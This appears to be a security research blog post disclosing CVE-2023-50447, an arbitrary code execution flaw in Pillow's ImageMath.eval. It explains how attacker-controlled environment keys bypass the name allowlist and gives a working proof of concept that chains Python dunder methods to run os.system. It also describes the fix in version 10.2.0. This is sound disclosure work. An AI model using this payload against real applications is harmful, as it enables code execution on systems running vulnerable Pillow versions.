During Checkmarx’s Research Group routine activities, we often conduct security assessments on open-source technologies to refine both our tools and our skillset. During one of these activities, I identified a Critical vulnerability in Pillow. It is present in the PIL.ImageMath.eval
function, in versions up to and including 10.1.0. This vulnerability was latter assigned CVE-2023-50447.
CVSS v3.1: 8.1
Serving as a successor to the Python Imaging Library (PIL), Pillow is a Python imaging library that provides a comprehensive set of tools for opening, manipulating, and saving various image file formats. It is widely used in web development, data analysis, computer vision, and other domains, providing a user-friendly interface. With support for numerous image formats and a rich set of features, Pillow is a go-to solution for developers and designers working with images in Python applications.
The ImageMath
module provides a single eval
function, which takes an expression string and one or more images. It’s basically a wrapper around Python’s built-in eval
function, but with a few more special operations for working with images. You can read more about this function and how it works in the Pillow documentation. Here is a usage example from the documentation, which includes two of the built-in functions — convert
and min
:
from PIL import Image, ImageMath
with Image.open('image1.jpg') as im1:
with Image.open('image2.jpg') as im2:
out = ImageMath.eval("convert(min(a, b), 'L')", a=im1, b=im2)
out.save('result.png')
It’s not the first time that a vulnerability has been discovered that leads to (spoiler alert!) arbitrary code execution in this function. Versions prior to 9.0.1 were vulnerable to CVE-2022-22817. In those versions, PIL.ImageMath.eval
allowed the evaluation of arbitrary expressions (i.e. there was no validation whatsoever of the expression provided), and so it was trivial to get code execution — e.g. ImageMath.eval('exec(...)')
.
To prevent this vulnerability, a commit was made with the aim of restricting the builtins available to PIL.ImageMath.eval()
. Let’s review this snippet of Pillow’s code with the filter responsible for ensuring that we’re not evaluating arbitrary objects:
code = compile(expression, "<string>", "eval")
...
for name in code.co_names:
if name not in args and name != "abs":
msg = f"'{name}' not allowed"
raise ValueError(msg)
expression
refers to the first parameter ofPIL.ImageMath.eval
, i.e. the string containing a Python-style expression;args
contains values to add to the evaluation context, which includes some built-in functions as well as the arguments passed to the second parameter ofPIL.ImageMath.eval
so that they can be referenced inside;compile
is a Python built-in function (docs) that compiles an expression into a code or AST object, so that it can later be executed byexec
oreval
;co_names
is an attribute of a code object that returns a tuple containing the names (e.g. names of used variables) in the expression — to be more precise, it’s in the bytecode object.
So what’s happening here is that it’s checking the names in the expression against an allowlist (i.e. args
). On the surface, it seems like a good solution, but like everything in application security, the devil is in the details…
Take a look at the code snippet one more time — what would happen if we could control this allowlist? We’d be able to use whatever “co_names
” we wanted and thus achieve arbitrary code execution! Unfortunately, it’s not that simple… We can’t just add an exec
to the PIL.ImageMath.eval
context and use the payload we saw earlier in CVE-2022-22817, because that exec
won’t be the Python function, but an Image
passed in as an argument:
ImageMath.eval("exec(...)", exec=Image.open(...))
Hmm… Now what? How can we bypass this? We need to get permission to use the “co_names
” we want to and at the same time we need those names to be the functions we actually want to call, not just the object passed as an argument. It was at this point that I remembered the challenges of some CTFs I played in the past related to Python jail/sandbox escapes — to bypass this we can use Python’s dunder (or magic) methods! Allow me to explain…
Although we can’t call arbitrary functions in the context of eval
, by controlling this allowlist, we can call arbitrary methods inside any present object. This is because the name of a method has a different context from the name of a variable, for example, if we take the code above it’s easy to see that the exec
in exec('whoami')
is different from Palpatine.exec('Order 66')
. Our exec
in the latter case won’t be “replaced” by the object passed to the PIL.ImageMath.eval
context since it is the exec
attribute corresponding to the Palpatine
object and not a standalone object.
In short, we now have the ability to call arbitrary attributes. This, along with the existence of dunder methods, can be used to achieve arbitrary code execution. HackTricks has some payloads that we can use for this.
That said, exploiting this vulnerability has some obstacles in real scenarios which result in high attack complexity and reduced overall risk: it is necessary for the images passed to the environment to be able to have names like “__class__”. Although this is a valid file name, applications need to be able to save images without changing this name. For instance, things like adding the file extension (e.g. jpg) to the filename would already prevent this vulnerability from being exploited.
It’s finally time to write a Proof Of Concept (POC). For this POC we need 5 images with the names: “__class__”, “__bases__”, “__subclasses__”, “load_module”, and “system”. Note that these are valid file names on any OS.
from PIL import Image, ImageMath
image1 = Image.open('__class__')
image2 = Image.open('__bases__')
image3 = Image.open('__subclasses__')
image4 = Image.open('load_module')
image5 = Image.open('system')
expression = "().__class__.__bases__[0].__subclasses__()[104].load_module('os').system('whoami')"
environment = {
image1.filename: image1,
image2.filename: image2,
image3.filename: image3,
image4.filename: image4,
image5.filename: image5
}
ImageMath.eval(expression, **environment)
We are considering that an attacker can control both the expression
and the names of the images passed to the environment
(i.e. the environment
keys). In this snippet, the images supplied to the PIL.ImageMath.eval
context will be accessible within the expression via their filenames. This allows us to use these filenames to call attributes with the same name. In a real application, this could happen if there was, for example, a feature that allowed us to upload images and another feature that let us evaluate expressions containing our images, with their respective names, through PIL.ImageMath.eval
— this would make a good web CTF challenge, hmm… Having managed to call arbitrary attributes, all that remains is to find a chain of dunders that will let us execute code. For this we use the chain described in expression
. That’s it!
I reported this vulnerability to the Pillow maintainers and it was fixed in version 10.2.0 (commit), as described in the Release Notes. To prevent this, keys matching the names of builtins and keys containing double underscores will now raise a ValueError
. I would also like to take this opportunity to thank the Pillow maintainers for their efficient communication and professionalism.
Thanks for reading, I hope it was interesting! 🙂